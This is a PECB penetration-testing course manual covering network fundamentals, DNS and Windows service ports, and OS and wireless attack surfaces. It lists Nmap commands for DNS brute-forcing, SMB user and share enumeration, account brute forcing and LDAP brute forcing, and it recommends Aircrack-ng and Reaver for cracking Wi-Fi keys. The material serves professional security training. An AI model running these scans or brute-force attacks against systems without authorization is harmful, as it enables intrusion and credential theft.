Schedule for Day 2

Section 8: Technical Foundation Knowledge

© 2015 PECB, Parker Solutions Group, Sysca Consulting

Version 1.2.2
Graeme Parker and Pablo Sisca (Editors)

Documents provided to participants are strictly reserved for training purposes and are copyrighted by Parker
Solutions Group and Sysca Consulting. Unless otherwise specified, no part of this publication may be, without the
written permission of Parker Solutions Group and Sysca Consulting, reproduced or used in any way or format or
by any means whether it be electronic or mechanical including photocopy and microfilm.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
1/70
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
2/70
The Open Systems Interconnection (OSI) model is a reference tool for understanding data communications
between any two networked systems.
It divides the communications processes into seven layers. Each layer both performs specific functions to
support the layers above it and offers services to the layers below it. The three lowest layers focus on passing
traffic through the network to an end system. The top four layers come into play in the end system to complete
the process.
1. The physical layer is responsible for:
Communication with thedata linklayer above it.
Fragmentation of data intoframes.
Reassembly of frames intodata linkProtocol Data Units.
Transmission to the physical media.
Receiving from the physical media.
Protocols :-
IEEE 802
IEEE 802.2
ISO 2110
ISDN
2. Thedata linklayer is concerned with physical addressing, network topology, physical link management, error
notification, ordered delivery of frames, and flow control.
Protocols :
a) Logical Link Control (LLC)
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
3/70
i. Error correction and flow control
ii. Manages link control
b) Media Access Control (MAC)
i. Communicates with the adapter card.
ii. Controls the type of media being used.
3. Network Layer
Translates logical network address and names to their physical address (e.g. computername ==> MAC address).
Responsible for addressing, determining routes for sending and managing network problems such as packet
switching, data congestion and routing.
If router can’t send data frame as large as the source computer sends, the network layer compensates by
breaking the data into smaller units. At the receiving end, the network layer reassembles the data.
Protocols :-
IP
ARP
RARP
ICMP
RIP
OSFP
IGMP
IPX
NWLink
NetBEUI
OSI
DDP
DECnet
4. Transport layer offers end-to-end communication between devices through a network. depending on the
application, the transport layer either offers reliable, connection-oriented or connectionless, best-effort
communications.
Two transport layer protocols:
1.Transmission Control Protocol (TCP),
2. User Datagram Protocol (UDP),
Functions :
Communicate with theSessionlayer above.
ReassembletransportProtocol Data Units into data streams
Reliableprotocols operating at this layer will
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
4/70
Detect errors and lost data
Recover lost data
Manage retransmission of data.
Segmentation of data streams intotransportProtocol Data Units.
Communicate with theNetworklayer below.
Protocols :
TCP
ARP
RARP
SPX
NWLink
NetBIOS / NetBEUI
ATP
UDP
DCCP
5. The session layer sets up, coordinates, and terminates conversations, exchanges, and dialogues between the
applications at each end.
Functions :
Session establishment, maintenance and termination: allows two application processes on different machines to
establish, use and terminate a connection, called a session.
Session support: performs the functions that allow these processes to communicate over the network, performing
security, name recognition, logging, and so on.
Protocols :
NetBIOS
Names Pipes
Mail Slots
RPC
SAP
L2TP
PPTP
SPDY
6. Presentation Layer
Character code translation
Character code translation: for example, ASCII to EBCDIC.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
5/70
Data conversion: bit order, CR-CR/LF, integer-floating point, and so on.
Data compression: reduces the number of bits that need to be transmitted on the network.
Data encryption: encrypt data for security purposes. For example, password encryption.
7. Application Layer
The OSI model defines theapplicationlayer as being the user interface. The OSI application layer is responsible
for displaying data and images to the user in a human-recognizable format and to interface with
thepresentationlayer below it.
Examples of applications that utilize the network are:
Telnet
FTP
Instant Message software (AIM, MSN, ICQ, Yahoo)
Microsoft Windows File Shares
Web Browsers (Internet Explorer, Firefox, Google Chrome, Safari)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
6/70
DNS Servers Services are used to translate names such as www.pecb.org or main.domain.company into IP
Addresses in order to route the traffic to the right Server hosting the Services.
In order words is our telephone directory in which a number can be matched to a friend, business or contact.
Although IP Addresses can be remembered (Particularly IP version 4), it provides a flexible way to maintain a
large number of names and IP Addresses across the globe.
DNS Services works in a hierarchical structure in which queries are passed through different servers in order to
find a match and an IP Address associated.
Any vulnerability or misconfiguration in these services would allow an attacker (and a professional Pen Tester) to
re-direct normal users to rogue or controlled servers ultimately forcing them to either login in using their
credentials or disclosed sensitive information such as credit card details or password recovery information or
even exploit some client software vulnerabilities and potentially take control of their host.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
7/70
Terminology – Understanding DNS Basics
Zone
A collection of hostname/IP pairs all managed together. Think of this as a ‘Domain’. www.pecb.org, test.pecb.org
etc belongs to the pecb.org domain
Nameserver
Server software answering DNS questions such as ‘what’s the IP for www.pecb.org?’ Authoritative for the zone
or keep asking to other servers (recursive nameserver) if it doesn’t know the answer directly.
Authoritative Nameserver
An authoritative name server provides actual answer to your DNS queries.
It provides original and definitive answers to DNS queries. It does not provides just cached answers that were
obtained from another name server. Therefore it only returns answers to queries about domain names that are
installed in its configuration system.
There are two types of Authoritative Name Servers:
Master server (primary name server) – A master server stores the original master copies of all zone records. A
hostmaster only make changes to master server zone records. Each slave server gets updates via special
automatic updating mechanism of the DNS protocol. All slave servers maintain an identical copy of the master
records.
Slave server (secondary name server) – A slave server is exact replica of master server. It is used to share
DNS server load and to improve DNS zone availability in case master server fails. It is recommend that you
should at least have 2 slave servers and one master server for each domain name.
$ host -t ns pecb.org
pecb.org name server ns3.dreamhost.com.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
8/70
pecb.org name server ns1.dreamhost.com.
pecb.org name server ns2.dreamhost.com.
Resolver
This is the client part of the DNS client/server system: it asks the questions about hostnames. The resolver is
usually a small library compiled into each program that requires DNS services, and it knows just enough to send
questions to a nearby nameserver.
On Linux/UNIX systems, the location of the servers-to-ask is found in the file /etc/resolv.conf, and on Windows
it's part of the Network Connections setup in the control panel. This usually consists of a list of IP addresses,
each of which expects to find a nameserver on the other end.
Resolvers are usually very small and dumb, relying on the servers to do the heavy lifting.
Recursive Nameserver
This is a nameserver that's willing to go out on the internet and find the results for zones it's not authoritative for,
as a service to its clients. Not all nameservers are configured to provide recursive service, or are limited to just
trusted clients (say, an ISP may provide nameservice only to its customers).
Resource Record
Though most think of DNS as providing hostname-to-IP mapping, there are actually other kinds of questions we
can ask of a nameserver, and this highlights the notion that DNS is really a database of "resource records".
The most common type is an IP Address (an "A" record), but other records exist too: NS (nameserver), MX (mail
exchanger), SOA (Start of Authority), and so on.
Delegation
When a nameserver doesn't have the contents of a zone, but knows how to find the owner, it's said to delegate
service of that zone to another nameserver. Informally, it's a pass-the-buck mechanism: "I know the zone you're
asking about, go ask (hostname) for the details".

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
9/70
http://en.wikipedia.org/wiki/Domain_Name_System
http://en.wikipedia.org/wiki/DNS_hijacking
http://www.unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html

Understanding some of the vulnerabilities across the DNS from a Pen Tester point of view

DNS Enumerations
DNS Hijacking
DNS Spoofing

Nmap Scripting for DNS:

dns-blacklist
Checks target IP addresses against multiple DNS anti-spam and open proxy blacklists and returns a list of
services for which an IP has been flagged. Checks may be limited by service category (eg: SPAM, PROXY) or to
a specific service name.

dns-brute
Attempts to enumerate DNS hostnames by brute force guessing of common subdomains. With the dns-brute.srv
argument, dns-brute will also try to enumerate common DNS SRV records.
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
10/70
dns-cache-snoop
Performs DNS cache snooping against a DNS server.

dns-check-zone
Checks DNS zone configuration against best practices, including RFC 1912. The configuration checks are
divided into categories which each have a number of different tests.

dns-client-subnet-scan
Performs a domain lookup using the edns-client-subnet option which allows clients to specify the subnet that
queries supposedly originate from. The script uses this option to supply a number of geographically distributed
locations in an attempt to enumerate as many different address records as possible. The script also supports
requests using a given subnet.

dns-fuzz
Launches a DNS fuzzing attack against DNS servers.

dns-ip6-arpa-scan
Performs a quick reverse DNS lookup of an IPv6 network using a technique which analyzes DNS server
response codes to dramatically reduce the number of queries needed to enumerate large networks.

dns-nsec-enum
Enumerates DNS names using the DNSSEC NSEC-walking technique.

dns-nsec3-enum
Tries to enumerate domain names from the DNS server that supports DNSSEC NSEC3 records.

dns-nsid
Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid) and asking for its id.server
and version.bind values. This script performs the same queries as the following two dig commands: - dig CH
TXT bind.version @target - dig +nsid CH TXT id.server @target

dns-random-srcport
Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can make a DNS
server vulnerable to cache poisoning attacks (see CVE-2008-1447).

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
11/70
dns-random-txid
Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values can make a
DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).

dns-recursion
Checks if a DNS server allows queries for third-party names. It is expected that recursion will be enabled on your
own internal nameservers.

dns-service-discovery
Attempts to discover target hosts' services using the DNS Service Discovery protocol.

dns-srv-enum
Enumerates various common service (SRV) records for a given domain name. The service records contain the
hostname, port and priority of servers for a given service. The following services are enumerated by the script: -
Active Directory Global Catalog - Exchange Autodiscovery - Kerberos KDC Service - Kerberos Passwd Change
Service - LDAP Servers - SIP Servers - XMPP S2S - XMPP C2S

dns-update
Attempts to perform a dynamic DNS update without authentication.

dns-zeustracker
Checks if the target IP range is part of a Zeus botnet by querying ZTDNS @ abuse.ch. Please review the
following information before you start to scan:

https://zeustracker.abuse.ch/ztdns.php

dns-zone-transfer
Requests a zone transfer (AXFR) from a DNS server.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
12/70
Basic Network mapping using NMAP

•NMAP Pings SYN scanning;

•Network capturing / TCPDump or Wireshark ;
•DNS Enumerations

Duration of activity: 20 minutes

nmap -sSU -p 53 --script dns-nsid <target>

Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid) and asking for its
id.server and version.bind values. This script performs the same queries as the following two dig commands: -
dig CH TXT bind.version @target - dig +nsid CH TXT id.server @target

Example

$ sudo nmap -sSU -p 53 --script dns-nsid 192.168.1.1

Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-30 00:01 BST

Nmap scan report for 192.168.1.1
Host is up (0.0059s latency).

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
13/70
PORT STATE SERVICE
53/tcp open domain
53/udp open domain
| dns-nsid:
|_ bind.version: dnsmasq-2.68
MAC Address: 00:04:A7:0C:22:D3 (FabiaTech)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

$ nmap --script dns-brute www.pecb.org

Attempts to enumerate DNS hostnames by brute force guessing of common subdomains.

Host script results:

| dns-brute:
| DNS Brute-force hostnames:
| mysql.pecb.org - 67.205.8.96
| www.pecb.org - 67.205.10.57
| mail.pecb.org - 208.97.132.208
| ftp.pecb.org - 67.205.10.57
|_ ssh.pecb.org - 67.205.10.57

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
14/70
Most Pen Testing based activities are based on the same behaviour or principle regardless of the System,
infrastructure, OS, devices or applications.
They all share a common trunk based on
a)reconnaissance techniques to gather the detailed information needed to carry out attacks,
b)identify and enumerate systems using scanning techniques mapping services and potential vulnerabilities
c)gaining access to systems by exploiting the vulnerabilities (common publicly vulnerabilities or based on 0-day
research)
d)using further techniques to test escalation of privilege risks probing that an attacker could maintain access once
this is gained to a system and
e)extend the penetration further to other systems etc.
Each of these common blocks bring even more information for Pen Testers and usually attackers which will
redefine the attack vectors and goals.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
15/70
In order to understand in which ways systems, networks and application software can be penetrated and
assessed we will have to introduce the students to how Modern OS Security Architecture works and in which way
it either fails or succeed in preventing common exploitations.
http://en.wikipedia.org/wiki/Supervisor_mode#SUPERVISOR-MODE
The idea here is to introduce how Modern OS Security Architecture designs attempts to prevent full control of the
OS, infrastructure device or mobile computing by segregating high privileged operations and resource access.
The main objective is to understand how Local or Remote vulnerabilities could open specific attack venues (or
vectors) to a legitimate attacker in order to obtain specific access ultimately compromising not only the host but
the infrastructure in which it is sitting and its users and resources including private data etc.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
16/70
The basic principle of many modern OS including Windows Platform is that hosts or servers have to provide
Services to other hosts or users in a connected environment.
These services and applications usually can be used as attack vectors not only for the professional Pen Tester
but for real attackers.
Services and applications can contain vulnerabilities or be misconfigured allowing attackers to enumerate
services and users, gather passwords or access network shares.
Out-of-date software can allow attackers to exploit vulnerabilities either remotely or locally ultimately
compromising the OS, host and potentially the entire infrastructure.
Some unpatched client applications or even non disclosed vulnerabilities also knows as cero days vulnerabilities
would allow arbitrary code execution, usually restricted within the users security context, but with enough
background for a successful Penetration Testing to demonstrate the risk of such system.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
17/70
http://support.microsoft.com/kb/832017

The Net Logon system service maintains a security channel between your computer and the domain controller to
authenticate users and services. It passes the user's credentials to a domain controller and returns the domain
security identifiers and the user rights for the user. This is typically known as pass-through authentication. Net
Logon is configured to start automatically only when a member computer or domain controller is joined to a
domain. In the Windows 2000 Server and Windows Server 2003 families, Net Logon publishes service resource
locator records in the DNS. When this service runs, it relies on the WORKSTATION service and on the Local
Security Authority service to listen for incoming requests. On domain member computers, Net Logon uses RPC
over named pipes. On domain controllers, it uses RPC over named pipes, RPC over TCP/IP, mail slots, and
Lightweight Directory Access Protocol (LDAP).

System service name: Netlogon

Application protocol Protocol Ports
NetBIOS Datagram Service UDP 138 ³
NetBIOS Name Resolution UDP 137 ³
NetBIOS Session Service TCP 139 ³
SMB TCP 445
LDAP UDP 389
RPC TCP 135, random port number between 1024 - 65535
135, random port number between 49152 - 65535²
² This is the range in Windows Server 2012, Windows 8, Windows Server 2008 R2, Windows 7, Windows Server
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
18/70
2008, and Windows Vista.
³ The NETBIOS ports are optional. Netlogon uses these only for trusts that don't support DNS or when DNS fails
during an attempted fallback. If there is no WINS infrastructure and broadcasts can't work, you should either
disable NetBt or set the computers and servers to NodeType=2.

Note The Net Logon service uses RPC over named pipes for earlier versions of Windows clients. This service
has the same firewall requirements as the "File and Printer Sharing" feature.

Server Services
The Server system service provides RPC support and file sharing, print sharing, and named pipe sharing over
the network. The Server service lets users share local resources, such as disks and printers, so that other users
on the network can access them. It also enables named pipe communication between programs that are running
on the local computer and on other computers. Named pipe communication is memory that is reserved for the
output of one process to be used as input for another process. The input-accepting process does not have to be
local to the computer.

Note If a computer name resolves to multiple IP addresses by using WINS, or if WINS failed and the name is
resolved by using DNS, NetBIOS over TCP/IP (NetBT) tries to ping the IP address or addresses of the file server.
Port 139 communications depend on Internet Control Message Protocol (ICMP) echo messages. If IP version 6
(IPv6) is not installed, port 445 communications will also depend on ICMP for name resolution. Preloaded
Lmhosts entries will bypass the DNS resolver. If IPv6 is installed on computers that are running Windows Server
2003 or Windows XP operating systems, port 445 communications do not trigger ICMP requests.

The NetBIOS ports that are listed here are optional. Windows 2000 and newer clients can work over port 445.

System service name: lanmanserver

Application protocol Protocol Ports
NetBIOS Datagram Service UDP 138
NetBIOS Name Resolution UDP 137
NetBIOS Session Service TCP 139
SMB TCP 445

Terminal Services

Terminal Services provides a multi-session environment that enables client devices to access a virtual Windows
desktop session and Windows-based programs that are running on the server. Terminal Services enables
multiple users to be connected interactively to a computer.

System service name: TermService

Application protocol Protocol Ports
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
19/70
Terminal Services TCP 3389

World Wide Web Publishing Service

World Wide Web Publishing Service provides the infrastructure that you must have to register, manage, monitor,
and serve websites and programs that are registered with IIS. This system service contains a process manager
and a configuration manager. The process manager controls the processes where custom applications and
websites reside. The configuration manager reads the stored system configuration for World Wide Web
Publishing Service and makes sure that Http.sys is configured to route HTTP requests to the appropriate
application pools or operating system processes. You can use the Internet Information Services (IIS) Manager
snap-in to configure the ports that are used by this service. If the administrative website is enabled, a virtual
website is created that uses HTTP traffic on TCP port 8098.

System service name: W3SVC

Application protocol Protocol Ports
HTTP TCP 80
HTTPS TCP 443

Active Directory (Local Security Authority)

Active Directory runs under the Lsass.exe process and includes the authentication and replication engines for
Windows domain controllers. Domain controllers, client computers and application servers require network
connectivity to Active Directory over specific hard-coded ports. Additionally, unless a tunneling protocol is used to
encapsulate traffic to Active Directory, a range of ephemeral TCP ports between 1024 to 5000 and 49152 to
65535 are required.

Application protocol Protocol Ports

Active Directory Web Services (ADWS) TCP 9389
Active Directory Management Gateway Service TCP 9389
Global Catalog TCP 3269
Global Catalog TCP 3268
LDAP Server TCP 389
LDAP Server UDP 389
LDAP SSL TCP 636
IPsec ISAKMP UDP 500
NAT-T UDP 4500
RPC TCP 135
RPC randomly allocated high TCP ports TCP 1024 - 5000
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
20/70
 49152 - 65535¹
SMB TCP 445

¹ This is the range in Windows Server 2012, Windows 8, Windows Server 2008 R2, Windows 7, Windows Server
2008, and Windows Vista.

SNMP Service

SNMP Service lets the local computer service incoming Simple Network Management Protocol (SNMP)
requests. SNMP Service includes agents that monitor activity in network devices and report to the network
console workstation. SNMP Service provides a method of managing network hosts (such as workstation or
server computers, routers, bridges, and hubs) from a centrally-located computer that is running network
management software. SNMP performs management services by using a distributed architecture of
management systems and agents.

System service name: SNMP

Application protocol Protocol Ports
SNMP UDP 161

Remote Procedure Call (RPC)

The Remote Procedure Call (RPC) system service is an interprocess communication (IPC) mechanism that
enables data exchange and invocation of functionality that is located in a different process. The different process
can be on the same computer, on the LAN, or in a remote location, and it can be accessed over a WAN
connection or over a VPN connection. The RPC service serves as the RPC Endpoint Mapper and Component
Object Model (COM) Service Control Manager. Many services depend on the RPC service to start successfully.

System service name: RpcSs

Application protocol Protocol Ports
RPC TCP 135
RPC over HTTPS TCP 593
NetBIOS Datagram Service UDP 138
NetBIOS Name Resolution UDP 137
NetBIOS Session Service TCP 139
SMB TCP 445

Notes

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
21/70
RPC does not use only the hard-coded ports that are listed in the table. Ephemeral range ports that are used by
Active Directory and other components occur over RPC in the ephemeral port range. The ephemeral port range
depends on the server operating system that the client operating system is connected to.
The RPC Endpoint Mapper also offers its services by using named pipes. This service has the same firewall
requirements as the "File and Printer Sharing" feature.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
22/70
Common Pen Testing areas around Windows Services

Net Logon Services

System service name: Netlogon

Application protocol Protocol Ports
NetBIOS Datagram Service UDP 138
NetBIOS Name Resolution UDP 137
NetBIOS Session Service TCP 139
SMB TCP 445
LDAP UDP 389
RPC TCP 135, random port number between 1024 - 65535
135, random port number between 49152 – 65535

Server Services
System service name: lanmanserver
Application protocol Protocol Ports
NetBIOS Datagram Service UDP 138

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
23/70
NetBIOS Name Resolution UDP 137
NetBIOS Session Service TCP 139
SMB TCP 445

Terminal Services

System service name: TermService

Application protocol Protocol Ports
Terminal Services TCP 3389

World Wide Web Publishing Service

System service name: W3SVC

Application protocol Protocol Ports
HTTP TCP 80
HTTPS TCP 443

Active Directory (Local Security Authority)

Application protocol Protocol Ports

Active Directory Web Services (ADWS) TCP 9389
Active Directory Management Gateway Service TCP 9389
Global Catalog TCP 3269
Global Catalog TCP 3268
LDAP Server TCP 389
LDAP Server UDP 389
LDAP SSL TCP 636
IPsec ISAKMP UDP 500
NAT-T UDP 4500
RPC TCP 135
RPC randomly allocated high TCP ports TCP 1024 - 5000
49152 - 65535¹
SMB TCP 445
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
24/70
¹ This is the range in Windows Server 2012, Windows 8, Windows Server 2008 R2, Windows 7, Windows Server
2008, and Windows Vista.

SNMP Service

SNMP Service lets the local computer service incoming Simple Network Management Protocol (SNMP)
requests. SNMP Service includes agents that monitor activity in network devices and report to the network
console workstation. SNMP Service provides a method of managing network hosts (such as workstation or
server computers, routers, bridges, and hubs) from a centrally-located computer that is running network
management software. SNMP performs management services by using a distributed architecture of
management systems and agents.

System service name: SNMP

Application protocol Protocol Ports
SNMP UDP 161

Remote Procedure Call (RPC)

The Remote Procedure Call (RPC) system service is an interprocess communication (IPC) mechanism that
enables data exchange and invocation of functionality that is located in a different process. The different process
can be on the same computer, on the LAN, or in a remote location, and it can be accessed over a WAN
connection or over a VPN connection. The RPC service serves as the RPC Endpoint Mapper and Component
Object Model (COM) Service Control Manager. Many services depend on the RPC service to start successfully.

System service name: RpcSs

Application protocol Protocol Ports
RPC TCP 135
RPC over HTTPS TCP 593
NetBIOS Datagram Service UDP 138
NetBIOS Name Resolution UDP 137
NetBIOS Session Service TCP 139
SMB TCP 445

Notes
RPC does not use only the hard-coded ports that are listed in the table. Ephemeral range ports that are used by
Active Directory and other components occur over RPC in the ephemeral port range. The ephemeral port range
depends on the server operating system that the client operating system is connected to.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
25/70
The RPC Endpoint Mapper also offers its services by using named pipes. This service has the same firewall
requirements as the "File and Printer Sharing" feature.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
26/70
Basic Port mapping against a full Active Directory (Domain Controller) Windows Server & Windows 8 host
Basic Nmap / SMB NSE Scripts
nmap –sS <host> -vv
Enumeration of Users
nmap --script smb-enum-users.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 <host>
Enumeration of Shares
nmap --script smb-enum-shares.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 <host>
Brute forcing accounts
nmap --script smb-brute.nse -p445 <host>
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
Basic Vulnerability checking
nmap --script smb-check-vulns.nse -p445 <host>
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>
Sessions Enumerations
nmap --script smb-enum-sessions.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139 <host>

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
27/70
(Requires any access higher than anonymous; guests, users, or administrators are all able to perform this
request on Windows 2000, XP, 2003, and Vista.)
Shares Enumerations:
Finding open shares is useful to a penetration tester because there may be private files shared, or, if it's writable,
it could be a good place to drop a Trojan or to infect a file that's already there. Knowing where the share is could
make those kinds of tests more useful, except that determining where the share is requires administrative
privileges already.
Running NetShareEnumAll will work anonymously against Windows 2000, and requires a user-level account on
any other Windows version. Calling NetShareGetInfo requires an administrator account on all versions of
Windows up to 2003, as well as Windows Vista and Windows 7, if UAC is turned down.
Even if NetShareEnumAll is restricted, attempting to connect to a share will always reveal its existence. So, if
NetShareEnumAll fails, a pre-generated list of shares, based on a large test network, are used. If any of those
succeed, they are recorded.
Enumeration of Users
From a pen-testers perspective, retrieving the list of users on any given server creates endless possibilities.
Users are enumerated in two different ways (SAMR enumeration or LSA bruteforcing) by using this script and in
most permissive Pen Testing the default configuration (which is using both) will suffice.
Full information regarding these two enumeration techniques can be found here:
http://nmap.org/nsedoc/scripts/smb-enum-users.html
Tools that pioneering some of the techniques used by this script goes to enum.exe, sid2user.exe, and
user2sid.exe programs which illustrated SID/RID walking techniques plus added insight of how Microsoft
Windows handled Null Sessions in the past allowing anonymous users to make calls to functions such as
QueryDisplayInfo which returns a detailed list of users, along with descriptions, types, and full names.
This type of enumeration was also used to determine whether users have recently changed their passwords or
date of last update, blocked their accounts or even if they have never logged in into the system etc.
Useful information for a Pen Tester (and attackers) to target certain accounts to start password guessing or
password brute forcing attacks.
Duration of activity: 20 minutes
Further Reading
http://www.sans.org/reading-room/whitepapers/testing/scanning-windows-deeper-nmap-scanning-engine-33138
------
LDAP Enumeration using NMAP Scripts
LDAP Brute Force
nmap -p 389 --script ldap-brute --script-args \ ldap.base='"cn=users,dc=cqure,dc=net"' <host>
nmap -p 389 --script ldap-search --script-args
'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,
ldap.qfilter=users,ldap.attrib=sAMAccountName' <host>
nmap -p 389 --script ldap-search --script-args
'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,
ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows *Server*",ldap.attrib=
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
28/70
{operatingSystem,whencreated,OperatingSystemServicePack}' <host>
Attempts to perform an LDAP search and returns all matches.
If no username and password is supplied to the script the Nmap registry is consulted. If the ldap-brute script has
been selected and it found a valid account, this account will be used. If not anonymous bind will be used as a last
attempt.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
29/70
Ability to understand the LINUX / MAC OSX Architecture and the ways in which these OS can be exploited

Basically, similar approach to Windows Architecture would apply to these *nix flavours, though historically *nix
systems were more affected to network services, usually IP (Telnet, FTP, SSH, DNS, DHCP etc) than client
software as Windows seemed to always dominate the desktop / domain sphere.

Mac OSX are more Windows ‘like’ which started to change the focus ‘back’ to the end users affecting client
software applications such as Browsers like Safari and Firefox widely used and distributed with these OS.

Nevertheless, classic enumeration attacks to common Internet Services and out-of-date software still offer an
opportunity for Pen testers to access these OS, and extend the attack within DMZs or internal networks.

Although, most exploits have to circumvent OS Security mechanisms such as ASRL, DEP, SYSCALLS in
different ways to how Windows operate, the mechanics and logic (including the results) important for almost all
Penetration testing remain the same.

The principle of finding a vulnerable service or software, either locally or remote with the objective of taking
control of the host from a low privilege user to further escalate to a more privileged one such as Root or
Administrator and progressing by taking control of the other hosts in the network or ultimately the entire
infrastructure.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
30/70
Basic Port mapping against Windows Boxes and a Linux Server

Ports and Services enumeration / Identification of services and preparing tools for Brute Forcing
accounts.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
31/70
Ability to understand network infrastructure vulnerabilities and how network devices can be exploited

Let the students identify common vulnerabilities such as enumeration, information leakage, different attack
vectors etc.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
32/70
•WEP – IEEE first attempt at securing wireless comms. IV that was used for the RC4 stream cipher was not
sufficiently random, resulting in weak encryption
•WPA – Quick fix for WEP, still using WEP encryption but now with TKIP which was found to have vulnerabilities
related to it as well
•WPA2-TKIP – Similar to WPA, using TKIP that was found vulnerable to Beck-Tews attack and others. Not as
broken as WEP, but clearly not secure

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
33/70
•WPA2-CCMP(AES) – The latest improvement, replaced TKIP by CCMP that uses AES for stronger encryption.
No issues with it so far
•All PSK – All Pre-shared Key setups are vulnerable to bruteforce attacks. The shorter the key length, the more
likely someone with a fast GPU will crack it. WPA/WPA2 keys can be grabbed during 4 way handshake and
cracked offline.
•WPS – A “feature” in a lot of older wireless equipment, introduces a vulnerability that allows an attacker to brute
force a less than adequately sized PIN and take control of the router
Some tools and tips for Pen Testers
•For WEP and WPA/2 cracking and bruteforcing, Aircrack-ng is the tool of choice. It’s a suite that comes with
other tools such as Airmon to detect AP’s. Backtrack comes with all the tools and is usually the easiest way to
get up and cracking quickly
•For devices with WPS enabled, this will usually be your easy win regardless of the kind of encryption that has
been set on the AP. Use the tool Reaver https://code.google.com/p/reaver-wps/

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

